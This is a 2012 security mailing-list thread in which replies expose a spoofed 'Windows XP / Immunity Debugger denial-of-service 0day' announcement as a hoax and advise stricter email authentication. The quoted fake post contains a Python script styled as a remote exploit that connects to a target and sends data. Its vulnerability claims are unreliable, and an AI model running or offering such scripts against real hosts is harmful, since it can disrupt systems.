[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <20120417214848.06EFB6F454@smtp.hushmail.com>
Date: Tue, 17 Apr 2012 17:48:47 -0400
From: "Elazar Broad" <elazar@...hmail.com>
To: adam@...osecinstitute.com, full-disclosure@...ts.grok.org.uk
Subject: Re: Windows XP denial of service 0day found in
CTF exercise
<snip>
Received-SPF: softfail (lists.grok.org.uk: transitioning domain of
adam@...osecinstitute.com does not designate 46.167.245.118 as
permitted sender)
Received: from emkei.cz (emkei.cz [46.167.245.118]) by lists.grok.org.uk (Postfix) with ESMTP id D4324C0
for <full-disclosure@...ts.grok.org.uk>; Tue, 17 Apr 2012 07:58:09 +0100 (BST)
</snip>
At least configure your SPF record policy to hard fail, and consider Domain Keys and/or DMARC.
elazar
On Tuesday, April 17, 2012 at 10:40 AM, adam@...osecinstitute.com wrote:Guys, this is a fake release, someone spoofed my email and sent this out
as a joke to mock the wicd release from last week. Please note that if you
click on the links, there is nothing there concerning this.
>
> On 04/17/2012 02:48 AM, Adam Behnke wrote:
>> Immunity Debugger Remote Denial of Service 0Day Tested against
>> version 1.76 and 1.80 on Windows XP distributions
>>
>> Has not been tested for potential privilege escalation vectors.
>>
>> We first wrote about Immunity Debugger here:
>> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>>
>> Discovered by a student that wishes to remain anonymous in the
>> course CTF. This 0day exploit for Windows was discovered by a
>> student in the InfoSec Institute Ethical Hacking class, during an
>> evening CTF exercise. The student wishes to remain anonymous, he
>> has contributed a python version of the 0day. A patch that can be
>> applied to Windows has not been made available. You can find a
>> python version of the exploit to copy and paste here:
>>
>>
>> #!/usr/bin/python #Windows XP denial of service 0day exploit
>> discovered on 4.9.12 by InfoSec Institute student #For full write
>> up and description go to
>> http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>>
>>
> import sys
>> import os import time import getopt import socket
>>
>> class Error(Exception): def __init__(self, error):
>> self.errorStr=error def __str__(self): return repr(self.errorStr)
>>
>> class Exploit():
>>
>> def __init__(self, targetHost, targetPort): self.targetHost =
>> targetHost
>>
>> def exploit(self, targetHost, targetPort):
>>
>> try: socket.inet_aton(targetHost) s =
>> socket.socket(socket.AF_INET,socket.SOCK_STREAM)
>> s.connect((targetHost,targetPort)) except socket.error: raise
>> Error("Unable to exploit (Connect failed.)") sys.exit(0)
>>
>> # exploit try: s.sendto("\n\n\n", (targetHost, targetPort))
>> except: raise Error("Unable to exploit (Exploit failed.)")
>>
>> def usage(): print "[!] Usage:" print " ( -h, --help ):" print "
>> Print this message." print " ( --targetHost= ): Target host." print
>> " --targetHost=127.0.0.1" print " ( --targetPort= ): Target
>> port." print " --targetPort=8888"
>>
>> def main(): print "[$] Windows XP 0Day" try: opts, args =
>> getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=",
>> "targetPort="]) except getopt.GetoptError, err: # Print help
>> information and exit: print '[!] Parameter error:' + str(err) #
>> Will print something like "option -a not recognized" usage()
>> sys.exit(0)
>>
>> targetHost=None targetPort=None for opt, arg in opts: if opt in
>> ("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost":
>> targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I
>> would be assuming to say we'll never get here. print "[!] Parameter
>> error." usage() sys.exit(0) if not targetHost: print "[!]
>> Parameter error: targetHost not set." usage() sys.exit(0)
>>
>> if not targetPort: print "[!] Parameter error: targetPort not
>> set." usage() sys.exit(0)
>>
>> exploit = Exploit(targetHost, targetPort)
>>
>> print "[*] Attempting to exploit:" try:
>> exploit.exploit(targetHost, int(targetPort)) except Error as
>> error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0)
>> print "[*] Exploit appears to have worked."
>>
>> # Standard boilerplate to call the main() function to begin # the
>> program. if __name__=='__main__': main()
>>
>>
>>
>> _______________________________________________ Full-Disclosure -
>> We believe in it. Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
>> sponsored by Secunia - http://secunia.com/
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.12 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>
> iQIcBAEBAgAGBQJPjWNjAAoJEIH7slQlJAgKlw4P/0AzWqUuogRtF9wP2K91qFXq
> QVHn9h6QlaVZ8SfunKn/zypiVmjqg2eJqSiqy8MzGIF1yRUf28W81Ugugqq62kvL
> hFJcprsUhwnJCXZn+cWfPn64qoFKbN8uzIt85eWLcIBpIvdS7M5xm0g5Eva4hFrI
> CqFmyfH+HwF4emZ0pecJ207ePetx51qj27Hgfd5Wey8W4Mx2svJpaTnCJMvcvg3i
> FqE3/APG1qRrvFt0Qilqm6hpqSXhulQQQ8qw8k5BcHRn9FwJiDNQu/ykbSajOH4g
> z452bxVBK/IQ7QQB+sqwvhi+fMIOE2f0Saw/SDgGUGLlUSPg3aQ/7pFjf3VxbaL9
> K7xG3GFQp8g3Lp5Lvr0JkhNoePb0smymSTQ5o9NoTTAKELB/9lqSHOD4HEEGR09J
> DoZTYh7ee8DVPiGI+ttatYYw4mQAJR89E98skirX0Tntn2XQNPdlcejZwPWH56PV
> jB4+uKIlsQ0KgnbK5OSLVRFgxcq9OSK/pUEZPLPuAVJrkf17TfhF8by0lJYmyW8T
> 6Qf8GMiQjtP1ovL3BDuyxzAm9n3OpUMudXdtqBFq5XuagnImR2yZZkuTgkIXOt05
> 7PK28cqrKpTJixQNoiB4yLk65M1a8c8Ed/mXaHSFC04qn7RKhbMrdHmPzUnFpLCW
> 4r6K58WTZ7qR2nTNKnQi
> =Uoev
> -----END PGP SIGNATURE-----
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists